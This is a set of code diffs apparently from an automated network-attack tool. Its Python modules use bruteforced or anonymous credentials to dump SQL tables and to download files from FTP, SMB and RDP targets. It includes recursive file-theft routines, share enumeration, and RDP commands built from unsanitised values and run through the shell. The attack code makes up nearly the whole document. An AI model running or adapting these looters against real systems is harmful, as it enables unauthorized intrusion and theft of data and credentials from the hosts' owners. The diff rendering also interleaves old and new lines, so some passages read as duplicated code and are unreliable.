logger.info(f"Found {len(credentials)} credential combinations for {ip}")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
if not creds:
logger.error(f"No SQL credentials for {ip}. Skipping.")
return 'failed'
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def _timeout():
if not self.sql_connected:
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
def timeout():
if not self.sql_connected:
logger.error(f"No SQL connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
timer = Timer(240, timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
success = False
for username, password, database in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal data execution interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip} on database {database}")
# D'abord se connecter sans base pour vérifier les permissions globales
engine = self.connect_sql(ip, username, password)
if engine:
tables = self.find_tables(engine)
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"sql/{mac}_{ip}/{database}")
os.makedirs(local_dir, exist_ok=True)
for username, password, _db in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
base_engine = self.connect_sql(ip, username, password, database=None)
if not base_engine:
continue
if tables:
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
break
# Se connecter à la base spécifique pour le vol de données
db_engine = self.connect_sql(ip, username, password, schema)
if db_engine:
self.steal_data(db_engine, table, schema, local_dir)
success = True
counttables = len(tables)
logger.success(f"Successfully stolen data from {counttables} tables on {ip}:{port}")
tables = self.find_tables(base_engine)
if not tables:
continue
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Error stealing data from {ip} with user '{username}' on database {database}: {e}")
for table, schema in tables:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
db_engine = self.connect_sql(ip, username, password, database=schema)
if not db_engine:
continue
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
self.steal_data(db_engine, table, schema, local_dir)
if not success:
logger.error(f"Failed to steal any data from {ip}:{port}")
return 'failed'
else:
logger.success(f"Stole data from {len(tables)} tables on {ip}")
success = True
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SQL loot error {ip} {username}: {e}")
else:
logger.info(f"Skipping {ip} as it was not successfully bruteforced")
return 'skipped'
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
def b_parent_action(self, row):
"""
Get the parent action status from the row.
"""
return row.get(b_parent, {}).get(b_status, '')
if __name__ == "__main__":
shared_data = SharedData()
try:
steal_data_sql = StealDataSQL(shared_data)
logger.info("[bold green]Starting SQL data extraction process[/bold green]")
# Load the IPs to process from shared data
ips_to_process = shared_data.read_data()
# Execute data theft on each IP
for row in ips_to_process:
ip = row["IPs"]
steal_data_sql.execute(ip, b_port, row, b_status)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,198 +1,272 @@
"""
steal_files_ftp.py - This script connects to FTP servers using provided credentials or anonymous access, searches for specific files, and downloads them to a local directory.
steal_files_ftp.py — FTP file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
- IP -> (MAC, hostname) via DB.hosts.
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
"""
import os
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from ftplib import FTP
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesFTP"
# Action descriptors
b_class = "StealFilesFTP"
b_module = "steal_files_ftp"
b_status = "steal_files_ftp"
b_parent = "FTPBruteforce"
b_port = 21
b_port = 21
class StealFilesFTP:
"""
Class to handle the process of stealing files from FTP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesFTP initialized")
def connect_ftp(self, ip, username, password):
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Establish an FTP connection.
Return list[(user,password)] from DB.creds for this target.
Prefer exact IP; also include by MAC if known. Dedup preserves order.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='ftp'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- FTP helpers --------
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
# Max recursion depth for directory traversal (avoids symlink loops)
_MAX_DEPTH = 5
def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.connect(ip, port, timeout=10)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
logger.info(f"Connected to {ip}:{port} via FTP as {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
files: List[str] = []
if depth > self._MAX_DEPTH:
logger.debug(f"Max recursion depth reached at {dir_path}")
return []
try:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd(item) # if ok -> directory
files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
ftp.cwd('..')
except Exception:
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
# not a dir => file candidate
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(name in item for name in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
logger.error(f"FTP path error {dir_path}: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
# Check file size before downloading
try:
size = ftp.size(remote_file)
if size is not None and size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # SIZE not supported, try download anyway
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
logger.error(f"FTP download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '', port=port_i)
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
return 'failed'
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
def _timeout():
if not self.ftp_connected:
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first
ftp = try_anonymous()
if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
success = True
try:
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
except Exception:
pass
if success:
return 'success'
# Authenticated creds
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.info(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
ftp.quit()
except Exception:
pass
if success:
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")
finally:
if timer:
timer.cancel()

View File

@@ -1,184 +0,0 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,223 +1,252 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).
SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
import os
import logging
from rich.console import Console
from threading import Timer
import time
from threading import Timer
from typing import List, Tuple, Dict, Optional
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
b_port = 445
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSMB initialized")
def connect_smb(self, ip, username, password):
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds (grouped by share) --------
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
"""
Establish an SMB connection.
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
Prefer IP; also include MAC if known. Dedup per share.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
out: Dict[str, List[Tuple[str, str]]] = {}
seen: Dict[str, set] = {}
for row in (by_ip + by_mac):
share = str(row.get("database") or "").strip()
user = str(row.get("user") or "").strip()
pwd = str(row.get("password") or "").strip()
if not user or not share:
continue
if share not in out:
out[share], seen[share] = [], set()
if (user, pwd) in seen[share]:
continue
seen[share].add((user, pwd))
out[share].append((user, pwd))
return out
# -------- SMB helpers --------
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
conn.connect(ip, b_port)
self.smb_connected = True
logger.info(f"Connected SMB {ip} as {username}")
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.error(f"SMB connect error {ip} {username}: {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
def list_shares(self, conn: SMBConnection):
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
except Exception as e:
logger.error(f"Error listing shares: {e}")
logger.error(f"list_shares error: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
files: List[str] = []
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
for entry in conn.listPath(share, dir_path):
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if entry.isDirectory:
if entry.filename not in ('.', '..'):
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
name = entry.filename
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, name))
return files
except Exception as e:
logger.error(f"SMB path error {share}:{dir_path}: {e}")
raise
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share, remote_file, f)
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"SMB download error {share}:{remote_file}: {e}")
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
creds_by_share = self._get_creds_by_share(ip, port_i)
